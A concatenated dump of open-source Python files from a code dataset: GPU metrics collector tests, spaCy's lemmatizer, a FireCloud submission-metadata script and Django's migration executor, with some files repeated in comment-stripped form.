target_external_process.add_metric(["1", "123"], 1)
self.assertEqual(target_external_process, external_process)
target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter(
)
self.assertEqual(target_zombie_container, zombie_container)
target_gpu_temp = collector.gen_gpu_temperature_gauge()
target_gpu_temp.add_metric(["1", "GPU-uuid1"], 24.0)
self.assertEqual(target_gpu_temp, gpu_temp)
gpu_info = nvidia.construct_gpu_info([
nvidia.NvidiaGpuStatus(40, 20 * 1024 * 1024, [], nvidia.EccError(),
"2", "GPU-uuid2", 30.0)
])
metrics = GpuCollector.convert_to_metrics(
gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
20 * 1024 * 1024)
core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
target_core_utils = collector.gen_gpu_util_gauge()
target_core_utils.add_metric(["2", "GPU-uuid2"], 40)
self.assertEqual(target_core_utils, core_utils)
target_mem_utils = collector.gen_gpu_mem_util_gauge()
target_mem_utils.add_metric(["2", "GPU-uuid2"], 20 * 1024 * 1024)
self.assertEqual(target_mem_utils, mem_utils)
target_ecc_errors = collector.gen_gpu_ecc_counter()
target_ecc_errors.add_metric(["2", "GPU-uuid2", "volatile_single"], 0)
target_ecc_errors.add_metric(["2", "GPU-uuid2", "volatile_double"], 0)
target_ecc_errors.add_metric(["2", "GPU-uuid2", "aggregated_single"], 0)
target_ecc_errors.add_metric(["2", "GPU-uuid2", "aggregated_double"], 0)
self.assertEqual(target_ecc_errors, ecc_errors)
target_mem_leak = collector.gen_gpu_memory_leak_counter()
self.assertEqual(target_mem_leak, mem_leak)
target_external_process = collector.gen_gpu_used_by_external_process_counter(
)
self.assertEqual(target_external_process, external_process)
target_zombie_container = collector.gen_gpu_used_by_zombie_container_counter(
)
self.assertEqual(target_zombie_container, zombie_container)
target_gpu_temp = collector.gen_gpu_temperature_gauge()
target_gpu_temp.add_metric(["2", "GPU-uuid2"], 30.0)
self.assertEqual(target_gpu_temp, gpu_temp)
gpu_info = nvidia.construct_gpu_info([
nvidia.NvidiaGpuStatus(40, 20 * 1024 * 1024 + 1, [],
nvidia.EccError(), "3", "GPU-uuid3", 30.0)
])
metrics = GpuCollector.convert_to_metrics(
gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
20 * 1024)
core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
target_mem_leak = collector.gen_gpu_memory_leak_counter()
target_mem_leak.add_metric(["3", "GPU-uuid3"], 1)
self.assertEqual(target_mem_leak, mem_leak)
def test_convert_to_metrics_with_no_zombie_info_BUGFIX(self):
gpu_info = nvidia.construct_gpu_info([
nvidia.NvidiaGpuStatus(20, 21, [22, 33, 44], nvidia.EccError(), "0",
"GPU-uuid0", 40.0)
])
zombie_info = []
pid_to_cid_mapping = {
33: "def",
22: "ghi"
}
metrics = GpuCollector.convert_to_metrics(
gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
20 * 1024)
core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
self.assertEqual(0, len(zombie_container.samples))
self.assertEqual(1, len(external_process.samples))
self.assertEqual("0",
external_process.samples[0].labels["minor_number"])
self.assertEqual("44", external_process.samples[0].labels["pid"])
zombie_info = None
metrics = GpuCollector.convert_to_metrics(
gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
20 * 1024)
core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
self.assertEqual(0, len(zombie_container.samples))
self.assertEqual(1, len(external_process.samples))
self.assertEqual("0",
external_process.samples[0].labels["minor_number"])
self.assertEqual("44", external_process.samples[0].labels["pid"])
def test_convert_to_metrics_with_real_id_BUGFIX(self):
gpu_info = nvidia.construct_gpu_info([
nvidia.NvidiaGpuStatus(20, 21, [22], nvidia.EccError(), "0",
"GPU-uuid0", 50.0)
])
zombie_info = {"ce5de12d6275"}
pid_to_cid_mapping = {
22:
"ce5de12d6275dc05c9ec5b7f58484f075f4775d8f54f6a4be3dc1439344df356"
}
metrics = GpuCollector.convert_to_metrics(
gpu_info, zombie_info, self.make_pid_to_cid_fn(pid_to_cid_mapping),
20 * 1024)
core_utils, mem_utils, ecc_errors, mem_leak, external_process, zombie_container, gpu_temp, gpu_retired = metrics
self.assertEqual(1, len(zombie_container.samples))
self.assertEqual("0",
zombie_container.samples[0].labels["minor_number"])
self.assertEqual("ce5de12d6275",
zombie_container.samples[0].labels["container_id"])
class TestAtomicRef(base.TestBase):
def test_expiration(self):
ref = collector.AtomicRef(datetime.timedelta(seconds=10))
now = datetime.datetime.now()
delta = datetime.timedelta(seconds=1)
ref.set(1, now)
self.assertEquals(1, ref.get(now))
self.assertEquals(1, ref.get(now - delta))
self.assertEquals(1, ref.get(now + delta))
self.assertEquals(1, ref.get(now + delta * 10))
self.assertEquals(None, ref.get(now + delta * 11))
self.assertEquals(1, ref.get(now + delta * 10))
ref.set(2, now + delta)
self.assertEquals(2, ref.get(now))
self.assertEquals(2, ref.get(now + delta * 10))
self.assertEquals(2, ref.get(now + delta * 11))
self.assertEquals(None, ref.get(now + delta * 12))
if __name__ == '__main__':
unittest.main()
| true | true |
f72eae12827e90588b406e44397f79f94ffd2658 | 5,224 | py | Python | spacy/lemmatizer.py | gandersen101/spaCy | 109849bd311490f17a29b320cb032e43d153f36f | [
"MIT"
] | null | null | null | spacy/lemmatizer.py | gandersen101/spaCy | 109849bd311490f17a29b320cb032e43d153f36f | [
"MIT"
] | null | null | null | spacy/lemmatizer.py | gandersen101/spaCy | 109849bd311490f17a29b320cb032e43d153f36f | [
"MIT"
] | null | null | null | # coding: utf8
from __future__ import unicode_literals
from collections import OrderedDict
from .symbols import NOUN, VERB, ADJ, PUNCT, PROPN
from .errors import Errors
from .lookups import Lookups
from .parts_of_speech import NAMES as UPOS_NAMES
class Lemmatizer(object):
"""
The Lemmatizer supports simple part-of-speech-sensitive suffix rules and
lookup tables.
DOCS: https://spacy.io/api/lemmatizer
"""
@classmethod
def load(cls, *args, **kwargs):
raise NotImplementedError(Errors.E172)
def __init__(self, lookups, *args, is_base_form=None, **kwargs):
"""Initialize a Lemmatizer.
lookups (Lookups): The lookups object containing the (optional) tables
"lemma_rules", "lemma_index", "lemma_exc" and "lemma_lookup".
RETURNS (Lemmatizer): The newly constructed object.
"""
if args or kwargs or not isinstance(lookups, Lookups):
raise ValueError(Errors.E173)
self.lookups = lookups
self.is_base_form = is_base_form
def __call__(self, string, univ_pos, morphology=None):
"""Lemmatize a string.
string (unicode): The string to lemmatize, e.g. the token text.
univ_pos (unicode / int): The token's universal part-of-speech tag.
morphology (dict): The token's morphological features following the
Universal Dependencies scheme.
RETURNS (list): The available lemmas for the string.
"""
lookup_table = self.lookups.get_table("lemma_lookup", {})
if "lemma_rules" not in self.lookups:
return [lookup_table.get(string, string)]
if isinstance(univ_pos, int):
univ_pos = UPOS_NAMES.get(univ_pos, "X")
univ_pos = univ_pos.lower()
if univ_pos in ("", "eol", "space"):
return [string.lower()]
# See Issue #435 for example of where this logic is requied.
if callable(self.is_base_form) and self.is_base_form(univ_pos, morphology):
return [string.lower()]
index_table = self.lookups.get_table("lemma_index", {})
exc_table = self.lookups.get_table("lemma_exc", {})
rules_table = self.lookups.get_table("lemma_rules", {})
if not any((index_table.get(univ_pos), exc_table.get(univ_pos), rules_table.get(univ_pos))):
if univ_pos == "propn":
return [string]
else:
return [string.lower()]
lemmas = self.lemmatize(
string,
index_table.get(univ_pos, {}),
exc_table.get(univ_pos, {}),
rules_table.get(univ_pos, []),
)
return lemmas
def noun(self, string, morphology=None):
return self(string, "noun", morphology)
def verb(self, string, morphology=None):
return self(string, "verb", morphology)
def adj(self, string, morphology=None):
return self(string, "adj", morphology)
def det(self, string, morphology=None):
return self(string, "det", morphology)
def pron(self, string, morphology=None):
return self(string, "pron", morphology)
def adp(self, string, morphology=None):
return self(string, "adp", morphology)
def num(self, string, morphology=None):
return self(string, "num", morphology)
def punct(self, string, morphology=None):
return self(string, "punct", morphology)
def lookup(self, string, orth=None):
"""Look up a lemma in the table, if available. If no lemma is found,
the original string is returned.
string (unicode): The original string.
orth (int): Optional hash of the string to look up. If not set, the
string will be used and hashed.
RETURNS (unicode): The lemma if the string was found, otherwise the
original string.
"""
lookup_table = self.lookups.get_table("lemma_lookup", {})
key = orth if orth is not None else string
if key in lookup_table:
return lookup_table[key]
return string
def lemmatize(self, string, index, exceptions, rules):
orig = string
string = string.lower()
forms = []
oov_forms = []
for old, new in rules:
if string.endswith(old):
form = string[: len(string) - len(old)] + new
if not form:
pass
elif form in index or not form.isalpha():
forms.append(form)
else:
oov_forms.append(form)
# Remove duplicates but preserve the ordering of applied "rules"
forms = list(OrderedDict.fromkeys(forms))
# Put exceptions at the front of the list, so they get priority.
# This is a dodgy heuristic -- but it's the best we can do until we get
# frequencies on this. We can at least prune out problematic exceptions,
# if they shadow more frequent analyses.
for form in exceptions.get(string, []):
if form not in forms:
forms.insert(0, form)
if not forms:
forms.extend(oov_forms)
if not forms:
forms.append(orig)
return forms
| 37.049645 | 100 | 0.612749 |
from __future__ import unicode_literals
from collections import OrderedDict
from .symbols import NOUN, VERB, ADJ, PUNCT, PROPN
from .errors import Errors
from .lookups import Lookups
from .parts_of_speech import NAMES as UPOS_NAMES
class Lemmatizer(object):
@classmethod
def load(cls, *args, **kwargs):
raise NotImplementedError(Errors.E172)
def __init__(self, lookups, *args, is_base_form=None, **kwargs):
if args or kwargs or not isinstance(lookups, Lookups):
raise ValueError(Errors.E173)
self.lookups = lookups
self.is_base_form = is_base_form
def __call__(self, string, univ_pos, morphology=None):
lookup_table = self.lookups.get_table("lemma_lookup", {})
if "lemma_rules" not in self.lookups:
return [lookup_table.get(string, string)]
if isinstance(univ_pos, int):
univ_pos = UPOS_NAMES.get(univ_pos, "X")
univ_pos = univ_pos.lower()
if univ_pos in ("", "eol", "space"):
return [string.lower()]
.is_base_form(univ_pos, morphology):
return [string.lower()]
index_table = self.lookups.get_table("lemma_index", {})
exc_table = self.lookups.get_table("lemma_exc", {})
rules_table = self.lookups.get_table("lemma_rules", {})
if not any((index_table.get(univ_pos), exc_table.get(univ_pos), rules_table.get(univ_pos))):
if univ_pos == "propn":
return [string]
else:
return [string.lower()]
lemmas = self.lemmatize(
string,
index_table.get(univ_pos, {}),
exc_table.get(univ_pos, {}),
rules_table.get(univ_pos, []),
)
return lemmas
def noun(self, string, morphology=None):
return self(string, "noun", morphology)
def verb(self, string, morphology=None):
return self(string, "verb", morphology)
def adj(self, string, morphology=None):
return self(string, "adj", morphology)
def det(self, string, morphology=None):
return self(string, "det", morphology)
def pron(self, string, morphology=None):
return self(string, "pron", morphology)
def adp(self, string, morphology=None):
return self(string, "adp", morphology)
def num(self, string, morphology=None):
return self(string, "num", morphology)
def punct(self, string, morphology=None):
return self(string, "punct", morphology)
def lookup(self, string, orth=None):
lookup_table = self.lookups.get_table("lemma_lookup", {})
key = orth if orth is not None else string
if key in lookup_table:
return lookup_table[key]
return string
def lemmatize(self, string, index, exceptions, rules):
orig = string
string = string.lower()
forms = []
oov_forms = []
for old, new in rules:
if string.endswith(old):
form = string[: len(string) - len(old)] + new
if not form:
pass
elif form in index or not form.isalpha():
forms.append(form)
else:
oov_forms.append(form)
forms = list(OrderedDict.fromkeys(forms))
# frequencies on this. We can at least prune out problematic exceptions,
# if they shadow more frequent analyses.
for form in exceptions.get(string, []):
if form not in forms:
forms.insert(0, form)
if not forms:
forms.extend(oov_forms)
if not forms:
forms.append(orig)
return forms
| true | true |
f72eaedaba0b8ff86ee1179bca09e69c0be08394 | 5,122 | py | Python | terra/csel.py | broadinstitute/dockstore-tool-cms2 | 4ff3efbc814aa9deb0a94a4715aa992670ee4d60 | [
"Apache-2.0"
] | null | null | null | terra/csel.py | broadinstitute/dockstore-tool-cms2 | 4ff3efbc814aa9deb0a94a4715aa992670ee4d60 | [
"Apache-2.0"
] | null | null | null | terra/csel.py | broadinstitute/dockstore-tool-cms2 | 4ff3efbc814aa9deb0a94a4715aa992670ee4d60 | [
"Apache-2.0"
] | 1 | 2020-11-10T22:02:21.000Z | 2020-11-10T22:02:21.000Z | #!/usr/bin/env python3
import argparse
import copy
import datetime
#from firecloud import fiss
import json
import operator
import subprocess
import sys
import time
#print(fiss.meth_list(args=argparse.Namespace()))
import firecloud.api as fapi
SEL_NAMESPACE='um1-encode-y2s1'
SEL_WORKSPACE='selection-sim'
#dir(fapi)
#help(fapi)
z = fapi.list_workspace_configs(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, allRepos=True).json()
print(z)
z = fapi.get_workspace_config(workspace=SEL_WORKSPACE, namespace=SEL_NAMESPACE,
config='dockstore-tool-cms2', cnamespace=SEL_NAMESPACE)
print('CONFIG_IS', z, z.json())
def dump_file(fname, value):
"""store string in file"""
with open(fname, 'w') as out:
out.write(str(value))
#z = fapi.create_submission(wnamespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE,
# cnamespace=SEL_NAMESPACE, config='dockstore-tool-cosi2')
#print('SUBMISSION IS', z, z.json())
#z = fapi.get_config_template(namespace='dockstore', method='dockstore-tool-cosi2', version=1)
#print(z.json())
def _pretty_print_json(json_dict, sort_keys=True):
"""Return a pretty-printed version of a dict converted to json, as a string."""
return json.dumps(json_dict, indent=4, separators=(',', ': '), sort_keys=sort_keys)
def _write_json(fname, **json_dict):
dump_file(fname=fname, value=_pretty_print_json(json_dict))
print('converting', fname, 'to org')
subprocess.check_call(f'./util/to_org.sh {fname}', shell=True)
print('converted', fname, 'to org')
def get_workflow_metadata_gz(namespace, workspace, submission_id, workflow_id):
"""Request the metadata for a workflow in a submission.
Args:
namespace (str): project to which workspace belongs
workspace (str): Workspace name
submission_id (str): Submission's unique identifier
workflow_id (str): Workflow's unique identifier.
Swagger:
https://api.firecloud.org/#!/Submissions/workflowMetadata
"""
uri = "workspaces/{0}/{1}/submissions/{2}/workflows/{3}".format(namespace,
workspace, submission_id, workflow_id)
headers = copy.deepcopy(fapi._fiss_agent_header())
headers.update({'Accept-Encoding': 'gzip', 'User-Agent': 'gzip'})
return fapi.__get(uri, headers=headers)
#print('ENTITIES ARE', fapi.list_entity_types(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE).json())
z = fapi.list_submissions(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE)
#print('SUBMISSIONS ARE', z, z.json())
_write_json('tmp/submissions.json', **{'result': list(z.json())})
tot_time = 0
for submission_idx, s in enumerate(sorted(list(z.json()), key=operator.itemgetter('submissionDate'), reverse=True)):
print('looking at submission from', s['submissionDate'])
submission_date = s['submissionDate']
if not submission_date.startswith(datetime.datetime.now().strftime('%Y-%m-%d')):
print('skipping submission date ', submission_date)
continue
print('====================================================')
print(s)
print('getting submission')
submission_id = s['submissionId']
y = fapi.get_submission(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id).json()
print('got submission')
_write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.subm.json', **y)
if 'workflowId' not in y['workflows'][0]:
print('workflow ID missing from submission!')
continue
print('getting workflow metadata for workflow id ', y['workflows'][0]['workflowId'])
beg = time.time()
zz_result = get_workflow_metadata_gz(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id,
workflow_id=y['workflows'][0]['workflowId'])
print('ZZ_RESULT: ', type(zz_result), dir(zz_result), zz_result)
for f in dir(zz_result):
print(' ', f, ' = ', getattr(zz_result, f))
print('ZZ_RESULT.raw: ', type(zz_result.raw), dir(zz_result.raw), zz_result.raw)
for f in dir(zz_result.raw):
print(' ', f, ' = ', getattr(zz_result.raw, f))
print('converting workflow metadata to json')
try:
zz = zz_result.json()
except Exception as e:
print('Error converting to json:', e)
zz = {}
tot_time += (time.time() - beg)
print('saving workflow metadata')
_write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.mdata.json', **zz)
if 'submittedFiles' in zz:
dump_file(fname=f'tmp/{submission_date}.{submission_idx}.{submission_id}.workflow.wdl', value=zz['submittedFiles']['workflow'])
#succ = [v["succeeded"] for v in zz['outputs']["run_sims_cosi2.replicaInfos"]]
#print(f'Succeeded: {sum(succ)} of {len(succ)}')
# zzz = fapi.get_workflow_metadata(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=s['submissionId'],
# workflow_id='ad1e8271-fe66-4e05-9005-af570e9e5884').json()
# _write_json('tmp/jz.json', **zzz)
print('tot_time=', tot_time, file=sys.stderr)
| 42.330579 | 135 | 0.679617 |
import argparse
import copy
import datetime
import json
import operator
import subprocess
import sys
import time
import firecloud.api as fapi
SEL_NAMESPACE='um1-encode-y2s1'
SEL_WORKSPACE='selection-sim'
z = fapi.list_workspace_configs(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, allRepos=True).json()
print(z)
z = fapi.get_workspace_config(workspace=SEL_WORKSPACE, namespace=SEL_NAMESPACE,
config='dockstore-tool-cms2', cnamespace=SEL_NAMESPACE)
print('CONFIG_IS', z, z.json())
def dump_file(fname, value):
with open(fname, 'w') as out:
out.write(str(value))
def _pretty_print_json(json_dict, sort_keys=True):
return json.dumps(json_dict, indent=4, separators=(',', ': '), sort_keys=sort_keys)
def _write_json(fname, **json_dict):
dump_file(fname=fname, value=_pretty_print_json(json_dict))
print('converting', fname, 'to org')
subprocess.check_call(f'./util/to_org.sh {fname}', shell=True)
print('converted', fname, 'to org')
def get_workflow_metadata_gz(namespace, workspace, submission_id, workflow_id):
uri = "workspaces/{0}/{1}/submissions/{2}/workflows/{3}".format(namespace,
workspace, submission_id, workflow_id)
headers = copy.deepcopy(fapi._fiss_agent_header())
headers.update({'Accept-Encoding': 'gzip', 'User-Agent': 'gzip'})
return fapi.__get(uri, headers=headers)
z = fapi.list_submissions(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE)
_write_json('tmp/submissions.json', **{'result': list(z.json())})
tot_time = 0
for submission_idx, s in enumerate(sorted(list(z.json()), key=operator.itemgetter('submissionDate'), reverse=True)):
print('looking at submission from', s['submissionDate'])
submission_date = s['submissionDate']
if not submission_date.startswith(datetime.datetime.now().strftime('%Y-%m-%d')):
print('skipping submission date ', submission_date)
continue
print('====================================================')
print(s)
print('getting submission')
submission_id = s['submissionId']
y = fapi.get_submission(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id).json()
print('got submission')
_write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.subm.json', **y)
if 'workflowId' not in y['workflows'][0]:
print('workflow ID missing from submission!')
continue
print('getting workflow metadata for workflow id ', y['workflows'][0]['workflowId'])
beg = time.time()
zz_result = get_workflow_metadata_gz(namespace=SEL_NAMESPACE, workspace=SEL_WORKSPACE, submission_id=submission_id,
workflow_id=y['workflows'][0]['workflowId'])
print('ZZ_RESULT: ', type(zz_result), dir(zz_result), zz_result)
for f in dir(zz_result):
print(' ', f, ' = ', getattr(zz_result, f))
print('ZZ_RESULT.raw: ', type(zz_result.raw), dir(zz_result.raw), zz_result.raw)
for f in dir(zz_result.raw):
print(' ', f, ' = ', getattr(zz_result.raw, f))
print('converting workflow metadata to json')
try:
zz = zz_result.json()
except Exception as e:
print('Error converting to json:', e)
zz = {}
tot_time += (time.time() - beg)
print('saving workflow metadata')
_write_json(f'tmp/{submission_date}.{submission_idx}.{submission_id}.mdata.json', **zz)
if 'submittedFiles' in zz:
dump_file(fname=f'tmp/{submission_date}.{submission_idx}.{submission_id}.workflow.wdl', value=zz['submittedFiles']['workflow'])
print('tot_time=', tot_time, file=sys.stderr)
| true | true |
f72eaf3c67b409384826a341503758bb4a502d32 | 14,180 | py | Python | lib/django/db/migrations/executor.py | ohmini/thaifoodapi | 36469959651d0deb7a323b7ca241b9c99e7a3502 | [
"BSD-3-Clause"
] | null | null | null | lib/django/db/migrations/executor.py | ohmini/thaifoodapi | 36469959651d0deb7a323b7ca241b9c99e7a3502 | [
"BSD-3-Clause"
] | null | null | null | lib/django/db/migrations/executor.py | ohmini/thaifoodapi | 36469959651d0deb7a323b7ca241b9c99e7a3502 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import unicode_literals
from django.apps.registry import apps as global_apps
from django.db import migrations
from .exceptions import InvalidMigrationPlan
from .loader import MigrationLoader
from .recorder import MigrationRecorder
from .state import ProjectState
class MigrationExecutor(object):
"""
End-to-end migration execution - loads migrations, and runs them
up or down to a specified set of targets.
"""
def __init__(self, connection, progress_callback=None):
self.connection = connection
self.loader = MigrationLoader(self.connection)
self.recorder = MigrationRecorder(self.connection)
self.progress_callback = progress_callback
def migration_plan(self, targets, clean_start=False):
"""
Given a set of targets, returns a list of (Migration instance, backwards?).
"""
plan = []
if clean_start:
applied = set()
else:
applied = set(self.loader.applied_migrations)
for target in targets:
# If the target is (app_label, None), that means unmigrate everything
if target[1] is None:
for root in self.loader.graph.root_nodes():
if root[0] == target[0]:
for migration in self.loader.graph.backwards_plan(root):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
# If the migration is already applied, do backwards mode,
# otherwise do forwards mode.
elif target in applied:
# Don't migrate backwards all the way to the target node (that
# may roll back dependencies in other apps that don't need to
# be rolled back); instead roll back through target's immediate
# child(ren) in the same app, and no further.
next_in_app = sorted(
n for n in
self.loader.graph.node_map[target].children
if n[0] == target[0]
)
for node in next_in_app:
for migration in self.loader.graph.backwards_plan(node):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
else:
for migration in self.loader.graph.forwards_plan(target):
if migration not in applied:
plan.append((self.loader.graph.nodes[migration], False))
applied.add(migration)
return plan
def migrate(self, targets, plan=None, fake=False, fake_initial=False):
"""
Migrates the database up to the given targets.
Django first needs to create all project states before a migration is
(un)applied and in a second step run all the database operations.
"""
if plan is None:
plan = self.migration_plan(targets)
# Create the forwards plan Django would follow on an empty database
full_plan = self.migration_plan(self.loader.graph.leaf_nodes(), clean_start=True)
all_forwards = all(not backwards for mig, backwards in plan)
all_backwards = all(backwards for mig, backwards in plan)
if not plan:
pass # Nothing to do for an empty plan
elif all_forwards == all_backwards:
# This should only happen if there's a mixed plan
raise InvalidMigrationPlan(
"Migration plans with both forwards and backwards migrations "
"are not supported. Please split your migration process into "
"separate plans of only forwards OR backwards migrations.",
plan
)
elif all_forwards:
self._migrate_all_forwards(plan, full_plan, fake=fake, fake_initial=fake_initial)
else:
# No need to check for `elif all_backwards` here, as that condition
# would always evaluate to true.
self._migrate_all_backwards(plan, full_plan, fake=fake)
self.check_replacements()
def _migrate_all_forwards(self, plan, full_plan, fake, fake_initial):
"""
Take a list of 2-tuples of the form (migration instance, False) and
apply them in the order they occur in the full_plan.
"""
migrations_to_run = {m[0] for m in plan}
state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
for migration, _ in full_plan:
if not migrations_to_run:
# We remove every migration that we applied from this set so
# that we can bail out once the last migration has been applied
# and don't always run until the very end of the migration
# process.
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
if self.progress_callback:
self.progress_callback("render_start")
state.apps # Render all -- performance critical
if self.progress_callback:
self.progress_callback("render_success")
state = self.apply_migration(state, migration, fake=fake, fake_initial=fake_initial)
migrations_to_run.remove(migration)
else:
migration.mutate_state(state, preserve=False)
def _migrate_all_backwards(self, plan, full_plan, fake):
"""
Take a list of 2-tuples of the form (migration instance, True) and
unapply them in reverse order they occur in the full_plan.
Since unapplying a migration requires the project state prior to that
migration, Django will compute the migration states before each of them
in a first run over the plan and then unapply them in a second run over
the plan.
"""
migrations_to_run = {m[0] for m in plan}
# Holds all migration states prior to the migrations being unapplied
states = {}
state = ProjectState(real_apps=list(self.loader.unmigrated_apps))
if self.progress_callback:
self.progress_callback("render_start")
for migration, _ in full_plan:
if not migrations_to_run:
# We remove every migration that we applied from this set so
# that we can bail out once the last migration has been applied
# and don't always run until the very end of the migration
# process.
break
if migration in migrations_to_run:
if 'apps' not in state.__dict__:
state.apps # Render all -- performance critical
# The state before this migration
states[migration] = state
# The old state keeps as-is, we continue with the new state
state = migration.mutate_state(state, preserve=True)
migrations_to_run.remove(migration)
else:
migration.mutate_state(state, preserve=False)
if self.progress_callback:
self.progress_callback("render_success")
for migration, _ in plan:
self.unapply_migration(states[migration], migration, fake=fake)
def collect_sql(self, plan):
"""
Takes a migration plan and returns a list of collected SQL
statements that represent the best-efforts version of that plan.
"""
statements = []
state = None
for migration, backwards in plan:
with self.connection.schema_editor(collect_sql=True) as schema_editor:
if state is None:
state = self.loader.project_state((migration.app_label, migration.name), at_end=False)
if not backwards:
state = migration.apply(state, schema_editor, collect_sql=True)
else:
state = migration.unapply(state, schema_editor, collect_sql=True)
statements.extend(schema_editor.collected_sql)
return statements
def apply_migration(self, state, migration, fake=False, fake_initial=False):
"""
Runs a migration forwards.
"""
if self.progress_callback:
self.progress_callback("apply_start", migration, fake)
if not fake:
if fake_initial:
# Test to see if this is an already-applied initial migration
applied, state = self.detect_soft_applied(state, migration)
if applied:
fake = True
if not fake:
# Alright, do it normally
with self.connection.schema_editor() as schema_editor:
state = migration.apply(state, schema_editor)
# For replacement migrations, record individual statuses
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_applied(app_label, name)
else:
self.recorder.record_applied(migration.app_label, migration.name)
# Report progress
if self.progress_callback:
self.progress_callback("apply_success", migration, fake)
return state
def unapply_migration(self, state, migration, fake=False):
"""
Runs a migration backwards.
"""
if self.progress_callback:
self.progress_callback("unapply_start", migration, fake)
if not fake:
with self.connection.schema_editor() as schema_editor:
state = migration.unapply(state, schema_editor)
# For replacement migrations, record individual statuses
if migration.replaces:
for app_label, name in migration.replaces:
self.recorder.record_unapplied(app_label, name)
else:
self.recorder.record_unapplied(migration.app_label, migration.name)
# Report progress
if self.progress_callback:
self.progress_callback("unapply_success", migration, fake)
return state
def check_replacements(self):
"""
Mark replacement migrations applied if their replaced set all are.
We do this unconditionally on every migrate, rather than just when
migrations are applied or unapplied, so as to correctly handle the case
when a new squash migration is pushed to a deployment that already had
all its replaced migrations applied. In this case no new migration will
be applied, but we still want to correctly maintain the applied state
of the squash migration.
"""
applied = self.recorder.applied_migrations()
for key, migration in self.loader.replacements.items():
all_applied = all(m in applied for m in migration.replaces)
if all_applied and key not in applied:
self.recorder.record_applied(*key)
def detect_soft_applied(self, project_state, migration):
"""
Tests whether a migration has been implicitly applied - that the
tables or columns it would create exist. This is intended only for use
on initial migrations (as it only looks for CreateModel and AddField).
"""
if migration.initial is None:
# Bail if the migration isn't the first one in its app
if any(app == migration.app_label for app, name in migration.dependencies):
return False, project_state
elif migration.initial is False:
# Bail if it's NOT an initial migration
return False, project_state
if project_state is None:
after_state = self.loader.project_state((migration.app_label, migration.name), at_end=True)
else:
after_state = migration.mutate_state(project_state)
apps = after_state.apps
found_create_model_migration = False
found_add_field_migration = False
# Make sure all create model and add field operations are done
for operation in migration.operations:
if isinstance(operation, migrations.CreateModel):
model = apps.get_model(migration.app_label, operation.name)
if model._meta.swapped:
# We have to fetch the model to test with from the
# embedded app cache, as it's not a direct dependency.
model = global_apps.get_model(model._meta.swapped)
if model._meta.proxy or not model._meta.managed:
continue
if model._meta.db_table not in self.connection.introspection.table_names(self.connection.cursor()):
return False, project_state
found_create_model_migration = True
elif isinstance(operation, migrations.AddField):
model = apps.get_model(migration.app_label, operation.model_name)
if model._meta.swapped:
# We have to fetch the model to test with from the
# embedded app cache, as it's not a direct dependency.
model = global_apps.get_model(model._meta.swapped)
if model._meta.proxy or not model._meta.managed:
continue
table = model._meta.db_table
db_field = model._meta.get_field(operation.name).column
fields = self.connection.introspection.get_table_description(self.connection.cursor(), table)
if db_field not in (f.name for f in fields):
return False, project_state
found_add_field_migration = True
# If we get this far and we found at least one CreateModel or AddField migration,
# the migration is considered implicitly applied.
return (found_create_model_migration or found_add_field_migration), after_state
| 47.424749 | 115 | 0.61488 | from __future__ import unicode_literals
from django.apps.registry import apps as global_apps
from django.db import migrations
from .exceptions import InvalidMigrationPlan
from .loader import MigrationLoader
from .recorder import MigrationRecorder
from .state import ProjectState
class MigrationExecutor(object):
def __init__(self, connection, progress_callback=None):
self.connection = connection
self.loader = MigrationLoader(self.connection)
self.recorder = MigrationRecorder(self.connection)
self.progress_callback = progress_callback
def migration_plan(self, targets, clean_start=False):
plan = []
if clean_start:
applied = set()
else:
applied = set(self.loader.applied_migrations)
for target in targets:
if target[1] is None:
for root in self.loader.graph.root_nodes():
if root[0] == target[0]:
for migration in self.loader.graph.backwards_plan(root):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
elif target in applied:
# may roll back dependencies in other apps that don't need to
# child(ren) in the same app, and no further.
next_in_app = sorted(
n for n in
self.loader.graph.node_map[target].children
if n[0] == target[0]
)
for node in next_in_app:
for migration in self.loader.graph.backwards_plan(node):
if migration in applied:
plan.append((self.loader.graph.nodes[migration], True))
applied.remove(migration)
else:
for migration in self.loader.graph.forwards_plan(target):
if migration not in applied:
plan.append((self.loader.graph.nodes[migration], False))
applied.add(migration)
return plan
def migrate(self, targets, plan=None, fake=False, fake_initial=False):
if plan is None:
plan = self.migration_plan(targets)
# Create the forwards plan Django would follow on an empty database
full_plan = self.migration_plan(self.loader.graph.leaf_nodes(), clean_start=True)
all_forwards = all(not backwards for mig, backwards in plan)
all_backwards = all(backwards for mig, backwards in plan)
if not plan:
pass # Nothing to do for an empty plan
elif all_forwards == all_backwards:
# This should only happen if there's a mixed plan
raise InvalidMigrationPlan(
"Migration plans with both forwards and backwards migrations "
"are not supported. Please split your migration process into "
